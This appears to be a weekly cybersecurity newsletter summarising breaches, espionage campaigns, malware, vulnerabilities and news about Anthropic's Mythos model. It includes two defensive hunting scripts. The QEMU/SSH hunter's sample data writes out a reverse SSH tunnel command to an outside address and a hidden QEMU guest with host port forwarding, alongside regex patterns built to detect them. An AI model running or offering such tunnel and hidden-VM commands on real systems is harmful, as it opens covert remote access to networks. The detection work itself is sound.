
Figure: @lcamtuf’s toot: “I’m sorry folks, but I checked with ICANN and we’re renaming ‘infosec’ to ‘Mythos hot takes’.”
Attackers have AI, so defenders need AI, so vendors are shipping fast. And somewhere in that chain someone hands access to a third-party vendor, and Anthropic's most restricted product ends up in unauthorized hands. This is the new normal: accelerated development, accelerated deployment, and an attack surface that grows with every integration.
The pressure is real — threat actors are using AI to find vulnerabilities faster, craft more convincing phishing, and automate what used to require skill and time. The defensive tooling market is responding accordingly, and Anthropic's Mythos is just the most visible example of a broader wave. But visibility cuts both ways. The more these tools embed themselves into organizational security infrastructure, the more they become targets themselves. A tool that finds 271 Firefox bugs is a tool someone else very much wants access to.
The answer isn't to slow down — it's to stop treating secure architecture as something you bolt on after shipping. Secure development practices, supply chain controls, and disciplined access management aren't obstacles to speed. They're what makes speed sustainable. The threat isn't going to wait for the industry to catch up, but neither will the next vendor breach. Align the pace of deployment with the rigor of the process — or expect to keep reading about it here.
You know the drill, scroll down to read about this week’s top insights 🚀
Table of Contents
🔓 BREACHES & SECURITY INCIDENTS
🇫🇷 France’s national agency for identity documents (ANTS) says it suffered a data breach last week that may have exposed personal details like names, emails, birth dates and addresses. A hacker called "breach3d" claims to be selling up to 19 million records, though the data has not been widely leaked. ANTS notified authorities, says no action is needed now, and warns people to watch for phishing.
💄 Cosmetics company Rituals confirmed hackers stole customer membership data from its database. The breach exposed names, birth dates, contact details, store preferences, and account types for customers in Europe, the UK, and some in the U.S. The company is investigating but has not disclosed how many members were affected or details of the attack.
🇺🇸 Three U.S. healthcare organizations in Illinois and Texas reported data breaches affecting about 600,000 people — the largest was North Texas Behavioral Health Authority (285,000), followed by Southern Illinois Dermatology (160,000) and Saint Anthony Hospital (146,000). Stolen data included personal and health information, with intrusions traced to network hacks, ransomware actors, and compromised employee email accounts.
🗾 🇺🇸 Seiko USA's website was defaced with a message claiming attackers stole its Shopify customer database. The hackers demanded a ransom and threatened to publish names, contact details, orders, and shipping addresses. Seiko has not confirmed the breach and has removed the extortion message.
🦋 Bluesky suffered a sophisticated DDoS attack starting April 15 that caused intermittent outages for feeds, notifications, threads, and search. The company said no private user data was accessed and it mitigated the attack after about a day. A group called 313 Team claimed responsibility, but that attribution has not been independently verified.
🇺🇸 Vercel says attackers gained unauthorized access to some internal systems and a limited number of customers may be affected. A threat actor claiming to be ShinyHunters is trying to sell stolen keys, source code, and employee records, and posted screenshots as proof. Vercel is investigating, working with incident responders and law enforcement, and telling customers to rotate secrets and review sensitive environment variables.
🥷🏻 CYBERCRIME, CYBER ESPIONAGE, APT’s
🇨🇳 👀 🇺🇸 A China-linked espionage campaign used zero-day flaws to install a persistent backdoor called Firestarter on Cisco firewalls. CISA says at least one US federal agency was infected and that firmware patches do not remove the malware. Agencies must upload core dumps for checks, patch, and hard-reset affected devices by the April 2026 deadlines.
🇨🇳 🇲🇳 A China-aligned APT called GopherWhisper infected about 12 Mongolian government systems with multiple Go- and C++‑based backdoors. The group used Discord, Slack, Outlook, and file[.]io for command-and-control and data exfiltration. ESET found activity timed to China Standard Time, suggesting the actor’s alignment.
❌ Spanish police shut down a major Spanish-language manga piracy site that ran since 2014 and served millions of users. They arrested four people and seized a complex server setup plus crypto wallets holding about $470,000. Authorities say the site made over $4.7 million from ads, harmed rights holders, and exposed minors to pornographic pop-ups.
🇺🇸 ⚖ Angelo Martino, a former ransomware negotiator, pleaded guilty to helping the ALPHV/BlackCat gang extort companies. He secretly gave criminals victims’ confidential info and shared in ransom profits. He faces up to 20 years in prison and authorities seized $10 million.
🇺🇸 ⚖ 🇬🇧 Tyler Robert Buchanan, a 24-year-old British member of the Scattered Spider hacking group, pleaded guilty to wire fraud conspiracy and aggravated identity theft. He admitted running mass SMS phishing and SIM-swap attacks in 2022 that helped steal millions in cryptocurrency and breach major tech firms. Buchanan is in U.S. custody, faces up to 22 years, and will be sentenced in August 2026.
🗓️ {Cyber,Info}Sec Events — A community-maintained list of infosec conferences worldwide. Subscribe to the ICS calendar feed to get events straight into your calendar, or follow @[email protected] on Mastodon for weekly digests. Contributions and ⭐ welcome!
👨🏻⚖️ 👀 GOVERNMENT, POLITICS, AND PRIVACY
🇨🇳 Twelve allied cyber agencies warned that China-linked hackers are building large covert networks from everyday routers and IoT devices. These networks let attackers hide their origin and carry out espionage, malware delivery, and infrastructure pre-positioning. Agencies urge stronger cybersecurity, active hunting, and sharing threat data to block and map these networks.
🇺🇸 👆 🗑 Sean Plankey asked President Trump to withdraw his nomination to lead CISA after a year without Senate confirmation. His renomination faced holds from several senators and was widely seen as stalled. The agency remains led by acting directors amid turnover and proposed budget cuts.
👀 📲 The U.K. says about 100 countries now have commercial spyware that can hack phones and computers. This tech is easier to get and has been used not just on criminals but also on journalists, bankers, and critics. Leaks and cybercriminals mean the tools can spread and threaten many more people.
🇺🇸 Reports say the NSA is using Anthropic’s restricted Mythos Preview model. Anthropic limited Mythos because it could enable offensive cyberattacks, yet gave access to about 40 organizations. The NSA reportedly uses it to scan for vulnerabilities amid a tense Pentagon-Anthropic dispute.
🦠 MALWARE & THREATS
🔑 Attackers briefly published a malicious @bitwarden/cli npm package that stole developer credentials and could spread to other projects. The malware harvested tokens, SSH keys, and cloud credentials, then exfiltrated encrypted data to public GitHub repos. Bitwarden removed the release, revoked access, and says only users who installed that version were affected.
🐧 A new Linux GoGra backdoor uses Microsoft Graph API and Outlook mailboxes to receive commands and return results. It authenticates with hardcoded Azure AD credentials, hides as a Conky autostart, and runs ELF files disguised as PDFs. Symantec links this tool to the Harvester espionage group, showing they are expanding to Linux targets.
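Two of the host artifacts in that summary are cheap to hunt for without any vendor tooling: an executable hiding behind a document extension, and an autostart entry that launches something from an unexpected location. The following is an added example, not Symantec's code or the backdoor's. It walks a directory and flags files whose suffix claims a document format but whose first bytes are an ELF header, and it lists XDG autostart entries whose Exec= target is an absolute path outside an assumed allowlist of system binary directories. The fixture tree, the file names and the allowlist are constructed for this example.

```python
"""Hunt for ELF files masquerading as documents and for autostart entries
launching binaries from untrusted locations (added example; fixture data
and the trusted-directory allowlist are assumptions, not published IoCs)."""
import tempfile
from pathlib import Path

ELF_MAGIC = b"\x7fELF"
PDF_MAGIC = b"%PDF-"
# Extensions a user would double-click expecting a document, not a binary.
DOC_SUFFIXES = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt"}
# Assumed allowlist: where legitimate autostart launchers normally live.
TRUSTED_BIN_DIRS = ("/usr/bin/", "/usr/local/bin/", "/bin/", "/usr/libexec/")


def find_masqueraded_elf(root: Path) -> list:
    """Return files under root whose suffix says 'document' but whose content is ELF."""
    hits = []
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in DOC_SUFFIXES:
            continue
        try:
            with path.open("rb") as fh:
                head = fh.read(len(ELF_MAGIC))
        except OSError:
            continue  # unreadable file: skip rather than abort the sweep
        if head == ELF_MAGIC:
            hits.append(path)
    return hits


def suspicious_autostart(autostart_dir: Path) -> dict:
    """Map autostart entry name -> Exec command when the launched binary is an
    absolute path outside TRUSTED_BIN_DIRS. Bare names resolve via PATH and are
    left to the operator (PATH hijacking via ~/.local/bin is a separate check)."""
    flagged = {}
    for entry in sorted(autostart_dir.glob("*.desktop")):
        exec_cmd = None
        for line in entry.read_text(errors="replace").splitlines():
            if line.startswith("Exec="):
                exec_cmd = line[len("Exec="):].strip()
                break
        if not exec_cmd:
            continue
        binary = exec_cmd.split()[0]
        if binary.startswith("/") and not binary.startswith(TRUSTED_BIN_DIRS):
            flagged[entry.name] = exec_cmd
    return flagged


def build_fixture() -> Path:
    """Constructed sample tree: one real PDF, one ELF header stored under a .pdf
    name, one autostart entry named like Conky but launching from a home dir,
    and one ordinary entry. Nothing here is a real sample."""
    root = Path(tempfile.mkdtemp(prefix="gogra-hunt-"))
    docs = root / "Documents"
    docs.mkdir()
    (docs / "invoice.pdf").write_bytes(PDF_MAGIC + b"1.7\n%constructed pdf body\n")
    (docs / "report_final.pdf").write_bytes(ELF_MAGIC + b"\x02\x01\x01" + b"\x00" * 9)
    auto = root / ".config" / "autostart"
    auto.mkdir(parents=True)
    (auto / "conky.desktop").write_text(
        "[Desktop Entry]\nType=Application\nName=Conky\nExec=/home/user/.cache/.conky/conky -d\n")
    (auto / "nm-applet.desktop").write_text(
        "[Desktop Entry]\nType=Application\nName=Network\nExec=nm-applet\n")
    return root


def run(root: Path) -> dict:
    """Run both checks against a home-directory-like tree."""
    return {
        "masqueraded_elf": [str(p.relative_to(root)) for p in find_masqueraded_elf(root)],
        "suspicious_autostart": suspicious_autostart(root / ".config" / "autostart"),
    }


if __name__ == "__main__":
    for check, result in run(build_fixture()).items():
        print(f"{check}: {result}")
```

Point `run()` at a real home directory (or `/home` as root) to sweep user profiles; the extension check is deliberately narrow so it stays quiet on a normal workstation, and the autostart check only lists entries for review rather than deciding they are malicious.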
🍎 🛍 Security firm Kaspersky found 26 fake crypto wallet apps on Apple’s App Store that steal recovery phrases and private keys. The FakeWallet campaign used typosquatting and phishing links to trick users, mainly targeting Chinese users but with no strict regional limits. Apple has been notified and is removing the malicious apps.
🎩 Researchers found Gentlemen ransomware affiliates using the SystemBC botnet of over 1,570 infected hosts to relay and deliver payloads. The gang’s RaaS encrypts many systems and now pairs Cobalt Strike, credential theft, and proxy infrastructure for targeted corporate attacks. Check Point warns this integration signals the group is scaling up and offers IoCs and detections for defenders.
🔙 🚪 Threat actors are abusing the QEMU emulator to hide backdoors and deliver ransomware and remote access tools. They exploit VPN and server vulnerabilities to run QEMU VMs with system privileges, create reverse SSH tunnels, and steal credentials and AD data. Organizations should hunt for unauthorized QEMU installs, rogue scheduled tasks, strange port forwarding, and outbound SSH tunnels.
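The hunting guidance in that item translates directly into a few command-line patterns. As an added example (not code from the reports it summarizes), the Python below takes process command lines, as you would collect them with `ps -eo user,args` or a Windows process inventory, and flags three of the listed artifacts: a QEMU guest started with host port forwarding (`-netdev ...,hostfwd=`), a QEMU disk image living outside the directories where the organization keeps VMs, and an SSH client opening a reverse tunnel (`-R`). The process lines and the image-directory allowlist are constructed for this example.

```python
"""Flag QEMU-based tunnel/backdoor indicators in process command lines
(added example; sample processes and KNOWN_IMAGE_DIRS are constructed)."""
import re
import shlex

# Constructed sample: one process per line, "user<TAB>command line".
# Line 2 is the kind of rogue QEMU the item describes; line 3 is a reverse
# SSH tunnel; the others are ordinary admin and developer activity.
SAMPLE_PROCESSES = """\
root\t/usr/libexec/qemu-kvm -name guest=build-vm -drive file=/var/lib/libvirt/images/build.qcow2 -netdev bridge,id=n0,br=virbr0 -device virtio-net,netdev=n0
SYSTEM\tC:\\Windows\\Temp\\qemu\\qemu-system-x86_64.exe -m 256 -drive file=C:\\Windows\\Temp\\qemu\\t.qcow2 -netdev user,id=n0,hostfwd=tcp::2222-:22 -device e1000,netdev=n0 -nographic
svc_backup\tssh -f -N -R 40022:127.0.0.1:22 -o StrictHostKeyChecking=no ops@203.0.113.10
alice\tssh -L 8080:intranet:80 bastion.example.com
alice\t/usr/bin/python3 -m http.server 8000
"""

# Assumed allowlist: where this organization legitimately stores VM images.
KNOWN_IMAGE_DIRS = ("/var/lib/libvirt/images/", "C:\\ProgramData\\VMs\\")

QEMU_BIN = re.compile(r"(^|[\\/])qemu(-system-[\w-]+|-kvm)?(\.exe)?$", re.IGNORECASE)
SSH_BIN = re.compile(r"(^|[\\/])ssh(\.exe)?$", re.IGNORECASE)


def _argv(cmdline: str) -> list:
    # posix=False keeps Windows backslashes intact instead of treating them as escapes.
    return shlex.split(cmdline, posix=False)


def _qemu_findings(user: str, argv: list) -> list:
    findings = []
    if not QEMU_BIN.search(argv[0]):
        return findings
    for i, arg in enumerate(argv):
        nxt = argv[i + 1] if i + 1 < len(argv) else ""
        # hostfwd exposes a guest port on the host: the pivot the item describes.
        if arg == "-netdev" and "hostfwd=" in nxt:
            findings.append(f"qemu run by {user} forwards host ports: {nxt}")
        if arg == "-drive":
            m = re.search(r"file=([^,]+)", nxt)
            if m and not m.group(1).startswith(KNOWN_IMAGE_DIRS):
                findings.append(f"qemu run by {user} boots image outside known paths: {m.group(1)}")
    return findings


def _ssh_findings(user: str, argv: list) -> list:
    findings = []
    if not SSH_BIN.search(argv[0]):
        return findings
    remote_fwd, flags = [], set()
    for i, arg in enumerate(argv[1:], 1):
        if arg in ("-N", "-f"):          # no remote command + background: tunnel kept alive
            flags.add(arg)
        if arg == "-R" and i + 1 < len(argv):
            remote_fwd.append(argv[i + 1])
        elif arg.startswith("-R") and len(arg) > 2:
            remote_fwd.append(arg[2:])
    if remote_fwd:
        findings.append(
            f"ssh run by {user} opens reverse tunnel(s) {remote_fwd} to {argv[-1]} "
            f"(flags: {sorted(flags)})")
    return findings


def hunt(process_dump: str) -> list:
    """Return human-readable findings for every suspicious process line."""
    findings = []
    for line in process_dump.splitlines():
        if not line.strip():
            continue
        user, _, cmdline = line.partition("\t")
        argv = _argv(cmdline)
        if argv:
            findings.extend(_qemu_findings(user, argv))
            findings.extend(_ssh_findings(user, argv))
    return findings


if __name__ == "__main__":
    for finding in hunt(SAMPLE_PROCESSES):
        print("[!]", finding)
```

Local forwards (`-L`) are left alone here because administrators use them constantly; if your environment has no legitimate SSH clients on servers at all, flag every `ssh` process instead. The QEMU check is about where the binary and image live and how the guest is networked, not about QEMU itself, which is legitimate software on many hosts.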
🤖 🧰 AI, CRYPTO, TECH & TOOLS
🔓 Reporters say an unidentified online group accessed Anthropic’s new enterprise security tool, Mythos, via a third-party vendor. Anthropic says it is investigating and has found no sign its own systems were breached. The group shared screenshots and demonstrations after getting in.
🇰🇵 💸 Hackers stole over $290 million in cryptocurrency from Kelp DAO — LayerZero says preliminary evidence points to North Korea’s TraderTraitor group using a bridge exploit and weak approval settings. Kelp DAO disputes LayerZero’s blame.
🐛 🧠 VULNERABILITIES, RESEARCH, AND THREAT INTELLIGENCE
➝ From the Patching Department:
💥 A privilege-escalation flaw in Microsoft Defender called BlueHammer (CVE-2026-33825) was publicly disclosed and patched April 14. Attackers used the published PoC to exploit the bug, alongside related techniques (RedSun, UnDefend), to try to gain SYSTEM privileges. Huntress and CISA reported active attempts involving compromised VPN access and urged immediate patching.
🩹 🐛 Apple released iOS and iPadOS updates to fix a bug that kept deleted message previews on devices. The flaw let cached notifications (including Signal chats) be recovered with forensic tools and was reportedly used by law enforcement. Installing the new patches removes the saved previews and prevents future retention.
🦊 Anthropic’s Claude Mythos found 271 potential Firefox bugs, and Mozilla patched many issues in Firefox 150. Only three were given public CVEs, which suggests most were lower-severity or non-exploitable findings. Security firms warn advanced AI can rapidly find and chain vulnerabilities, increasing risk if not controlled.
🛰️ ICS, OT & IoT
🦠 Dragos says the new ZionSiphon malware that supposedly targets Israeli water plants is overhyped — the code is broken, likely AI-generated, and shows little understanding of industrial control systems. Focusing on it distracts defenders from real threats like Volt Typhoon.
🐛 Researchers found serious vulnerabilities in serial-to-IP converters that let attackers run code, tamper firmware, and take over devices. These converters connect old industrial and healthcare gear to networks and thousands are exposed online. Patches are available from vendors, but unpatched devices could let hackers manipulate sensors or disrupt care and critical systems.
🛜 A Mirai botnet is exploiting a year-old command injection flaw (CVE-2025-29635) in discontinued D-Link DIR-823X routers. Attackers use crafted POST requests to run a shell script that downloads a Mirai-like payload. D-Link says these routers are end-of-life and should be retired.
💬 CONNECT
Follow me on Mastodon for quick daily updates and bite-sized content.
Prefer using an RSS feed? Add Infosec MASHUP to your feed here.
Enjoying our newsletter? Forward it to a colleague — it’s one of the best ways to support us.
Thanks for reading today’s newsletter, and if you're enjoying it and want to support my work, you can buy me a coffee ☕ over at https://www.buymeacoffee.com/0x58
See you next time!
-X.